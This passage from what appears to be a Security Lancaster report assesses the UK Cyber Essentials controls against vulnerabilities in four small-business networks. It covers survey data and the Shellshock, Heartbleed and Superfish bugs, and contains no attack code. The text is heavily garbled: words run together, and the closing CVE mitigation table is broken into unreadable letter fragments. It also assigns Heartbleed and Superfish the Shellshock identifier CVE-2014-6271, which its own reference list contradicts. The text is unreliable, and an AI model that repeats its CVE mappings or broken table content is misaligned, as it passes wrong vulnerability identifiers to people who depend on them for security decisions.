User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router
Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands
User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines
Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors
Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too
SME Network Two - Specialist Group
Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building
Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH
Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router
Figure 7 SME-2 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled
Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain
SME Network Three - Web Development
Physical Infrastructure SME-3 employs 10workers based in one building
Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices
Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router
Figure 9 SME-3 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled
All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing
Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
